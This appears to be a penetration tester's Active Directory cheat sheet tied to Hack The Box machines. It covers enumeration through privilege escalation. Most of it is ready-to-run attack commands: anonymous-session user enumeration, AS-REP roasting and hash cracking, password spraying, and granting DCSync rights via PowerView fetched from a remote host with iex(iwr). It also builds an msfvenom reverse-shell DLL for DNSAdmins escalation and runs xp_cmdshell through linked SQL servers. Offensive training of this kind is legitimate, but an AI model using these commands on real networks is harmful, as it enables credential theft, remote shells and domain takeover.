Active Directory ( Recon -> PE)

Enumeration

Enumeration is the key

Enumerate Usernames from every possible area
- RPC
- SMB
- LDAP
- Web Servers
- HTTPS/SSL Certificates
- WinRM possibly???
- Enumerate via SID's

Default Checklists

Check for anonymous, guest and null sessions on the open services
RPC

    * rpcclient -U '' -N 10.10.10.10 -c 'enumdomusers'

    * smbclient -N -U '' -L 10.10.10.10
    * cme smb -u 'anonymous' -p 'anonymous' --shares
    * cme smb -u 'Guest' -p '' --shares
    * cme smb -u 'Guest' -p '' --rid-brute

LDAP

        * ldapsearch -h $ip -x -s base namingcontexts
        * ldapsearch -h $ip -x -b "DC=domain,DC=tld" '(objectClass=person)'
        * windapsearch -d domain.tld -u '' -p '' -m users

Web Servers Enumerate users from contat page, members page etc..
SSL Certificates

    * Organization Name
    * Possibly an registered admin name ????

Enumerate via SID's

        * lookupsid.py anonymous@10.10.10.10 -no-pass 
        * lookupsid.py guest@10.10.10.10 -no-pass

Identify

After enumerating all the user names its time to identify which users are registered as a part of the network we are testing
This can be done with kerbrute

# add domain name form nmap output to /etc/hosts file
kerbrute userenum -d domainname --dc domainname usernames.txt -o valid_users.txt

Now with the valid users filter out the output and save its output to a new file

cat valid_users.txt | awk '{print $7}' > users

With the user names in hand, we can enumerate which user account is configured with DONOT REQUIRE KERBEROS PREAUTH with GetNPUsers.py from impackets which outputs an TGT ticket to the hacker which can be cracked to obtain the password of that user

GetNPUsers.py -usersfile users -outputfile hash -dc-ip 10.10.10.10 domain.tld/ 
hashcat -m -m 18200 hash /usr/share/wordlists/rockyou.txt --force

Enumerate Again

Once the valid credentials of the network user is obtained, enumerate the services once again as an authenticated user
SMB

    * crackmapexec smb 10.10.10.10 -u 'user' -p 'password' --shares
    * smbclient -u 'user' \\10.10.10.10\share

    * rpcclient -u 'user%password' 10.10.10.10

WinRM

    * evil-winrm -i 10.10.10.10 -u 'user' -p 'password'

LDAP

    * windapsearch -d domain.tld -u 'user' -p 'password' -m users # choose any module

Password Spraying

cme smb 10.10.10.10 -u user.txt -p 'password' --continue-on-success

Network Enumeration

Once these doesnt provide any useful information since we have the credentials of the network user we can query the network with bloodhound to obtain information which can help us in the exploitation

bloodhound-python -c all -u 'user' -p 'password' -d domain.tld -ns 10.10.10.10

BloodHound Permissions

WriteOwner - https://0xdf.gitlab.io/2018/11/10/htb-reel.html#privesc-tom---claire
GetChanges/GetChangesAll - https://0xdf.gitlab.io/2020/07/18/htb-sauna.html#priv-svc_loanmgr--root
WriteDACL
- On the domain - https://0xdf.gitlab.io/2020/03/21/htb-forest.html#privesc-to-administrator

# This is ippsec's method 0xdf used a oneliner 
iex(iwr -uri http://10.10.10.10/PowerView.ps1 -usebasicparsing)
$SecPassword = ConvertTo-SecureString 'ippsec123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB\dnoscp', $SecPassword)
Add-DomainObjectACL -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity "dnoscp" -Rights DCSync

Active Directory Recycle Bin

Get Information about deleted objects

Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
Get-ADObject -Filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property *

Machine

Cascade - https://0xdf.gitlab.io/2020/07/25/htb-cascade.html#privesc-arksvc--administrator

Group Exploitation

DNSAdmins

Members of DNS Admins can add dlls to the server which can be exploited to obtain reverse shell

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll > privesc.dll
impacket-smbserver share .
dnscmd.exe 127.0.0.1 /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
sc.exe stop dns
sc.exe start dns

Machine

Resolute - https://0xdf.gitlab.io/2020/05/30/htb-resolute.html#priv-ryan--system

Post Exploit

Get Domain Information

[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

Automated Enumeration

# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks"

Database Enumeration

# https://github.com/NetSPI/PowerUpSQL
Get-SQLServerLink -Instance server -Verbose
powershell.exe -c "Import-Module C:\Users\Public\PowerUpSQL.ps1; Invoke-SQLEscalatePriv -Verbose -Instance ECORP\sql"
# To see servers 
select srvname from master..sysservers;
# Native
Get-SQLServerLinkCrawl -Instance server -Query "exec master..xp_cmdshell 'whoami'"
# Linked database tables
select * from openquery("ECORP\FOO", 'select TABLE_NAME from FOO.INFORMATION_SCHEMA.TABLES') 
# You can also use meterpreter module exploit/windows/mssql/mssql_linkcrawler
# With meterpreter module you can find linked databases and if you are admin on them
# You can do a query and try to enable xp_cmpshell on that server
select * from openquery("server",'select * from master..sysservers') EXECUTE AS USER = 'internal_user' ('sp_configure "xp_cmdshell",1;reconfigure;') AT "server"

Offensive enumeration methods 👍👍👍👍👍 https://0xsp.com/offensive/red-team-cheatsheet/

PreviousPost Exploit Checks NextNotes

Last updated 3 years ago

Was this helpful?